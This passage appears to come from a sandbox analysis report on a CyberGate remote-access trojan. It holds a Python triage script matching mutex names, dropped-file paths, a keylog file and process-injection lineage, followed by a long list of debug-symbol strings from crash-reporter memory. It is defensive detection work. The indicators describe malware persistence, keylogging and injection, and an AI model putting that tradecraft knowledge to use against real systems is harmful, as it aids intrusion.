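The mutex names, dropped-file paths and process tree above are the host-side evidence an analyst actually reuses: CyberGate's `***MUTEX***` / `_x_X_*_X_x_` mutexes, the `C:\Windows\install\TEXTURAFIVEM.exe` drop, the `logs.dat` keylog file, and the pattern of a binary in `C:\Windows\install\` launching a 32-bit `C:\Windows\SysWOW64\explorer.exe` to host the injected payload. The script below is an added triage example, not part of this report or of any Joe Sandbox tooling. It assumes behaviour lines in the shape `Source: <process> <event>: <value>` (the sample lines are constructed from the values in this report, with a space between process and event), and it matches them against the indicators listed here plus two lineage rules: `explorer.exe` started from `SysWOW64` as a child of another process, and any process running from `C:\Windows\install\`. The "two indicator classes" threshold in `verdict()` is this example's own choice, not a rule from the report.

```python
"""Added triage example: match sandbox behaviour lines against the CyberGate
indicators in this report and flag suspicious process lineage."""
import re

# Indicators copied from the report's own mutex and file-creation lines.
CYBERGATE_MUTEXES = {
    "***MUTEX***",
    "_x_X_UPDATE_X_x_",
    "_x_X_BLOCKMOUSE_X_x_",
    "_x_X_PASSWORDLIST_X_x_",
}
CYBERGATE_FILES = {
    "c:\\windows\\install\\texturafivem.exe",
    "c:\\users\\user\\appdata\\roaming\\logs.dat",
    "c:\\users\\user\\appdata\\local\\temp\\xx--xx--xx.txt",
}
INSTALL_DIR = "c:\\windows\\install\\"  # drop directory seen in this report

# Assumed line shape (this example's own convention): "Source: <proc> <event>: <value>".
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+)\s+(?P<event>Mutant created|File created|Process created):\s*(?P<value>.+?)\s*$"
)
# Strip the per-session object-manager prefix so names compare against the IOC set.
MUTEX_PREFIX_RE = re.compile(r"^\\Sessions\\\d+\\BaseNamedObjects\\(?:Local\\)?", re.IGNORECASE)

# Constructed sample input, built from values listed in this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\dqH3t8JU1x.exe File created: C:\Users\user\AppData\Local\Temp\XX--XX--XX.txt",
    r"Source: C:\Windows\install\TEXTURAFIVEM.exe Mutant created: \Sessions\1\BaseNamedObjects\_x_X_UPDATE_X_x_",
    r"Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\***MUTEX***",
    r"Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4908",
    r"Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Roaming\logs.dat",
    r"Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe",
    r"Source: C:\Windows\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'",
    r"Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620",
]


def parse_line(line):
    """Return (process, event, value) or None for lines outside the assumed shape."""
    m = LINE_RE.match(line)
    return None if m is None else (m.group("proc"), m.group("event"), m.group("value"))


def mutex_name(value):
    """Bare mutex name without the \\Sessions\\N\\BaseNamedObjects\\ prefix."""
    return MUTEX_PREFIX_RE.sub("", value)


def lineage_findings(parent, child_cmd):
    """Lineage rules derived from the process tree in this report."""
    child = child_cmd.split()[0].lower()  # image path is the first token
    parent = parent.lower()
    findings = []
    if child.endswith("\\syswow64\\explorer.exe"):
        findings.append("32-bit explorer.exe from SysWOW64 started as a child process (injection host, not the user shell)")
    if parent.startswith(INSTALL_DIR):
        findings.append("parent runs from C:\\Windows\\install\\ (dropped binary in the Windows directory)")
    if child.startswith(INSTALL_DIR):
        findings.append("child runs from C:\\Windows\\install\\")
    return findings


def triage(lines):
    """Group indicator hits by class: mutexes, files, lineage."""
    hits = {"mutexes": [], "files": [], "lineage": []}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, event, value = parsed
        if event == "Mutant created":
            name = mutex_name(value)
            if name in CYBERGATE_MUTEXES:
                hits["mutexes"].append((proc, name))
        elif event == "File created":
            if value.lower() in CYBERGATE_FILES:
                hits["files"].append((proc, value))
        elif event == "Process created":
            for finding in lineage_findings(proc, value):
                hits["lineage"].append((proc, value.split()[0], finding))
    return hits


def verdict(hits):
    """Example threshold: two independent indicator classes before naming the family."""
    classes = sum(1 for v in hits.values() if v)
    return "cybergate-likely" if classes >= 2 else "inconclusive"


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for cls, entries in result.items():
        for entry in entries:
            print(cls, entry)
    print("verdict:", verdict(result))
```

On the sample lines the WerFault `WERReportingForProcess*` mutexes are ignored and the WerFault launch is flagged only because its parent lives in `C:\Windows\install\`, which is the right signal: the crash reporter itself is benign, the process that crashed is not.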
            Source: Binary string: msacm32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb= source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001C.00000003.530664291.0000000004FCE000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.553818944.0000000000BCA000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdbhr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbe source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdbq source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb{ source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdbc source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbp source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbw source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb|r# source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbzr- source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: winmm.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: KiUserCallbackDispatcherRSDSwntdll.pdb source: WerFault.exe, 00000025.00000002.603618013.0000000000C12000.00000004.00000001.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbRr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdbO source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdbF source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001C.00000003.530725448.00000000031F7000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552560599.0000000000B94000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.564345998.0000000003273000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdbY source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wininet.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb`? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb.rQ source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdbU source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb; source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: msacm32.pdbF? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbLrs source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbC source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb^r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb@r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ws2_32.pdbx? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: explorer.pdb source: WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdbA source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdbL? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbm source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdbr? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: userenv.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdbpr7 source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdbfr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb*Rp source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552533833.0000000000B8E000.00000004.00000001.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdbP?}& source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdbS source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msasn1.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbM source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbi source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbJr} source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: twinapi.pdb source: WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: WINMMBASE.pdbY source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
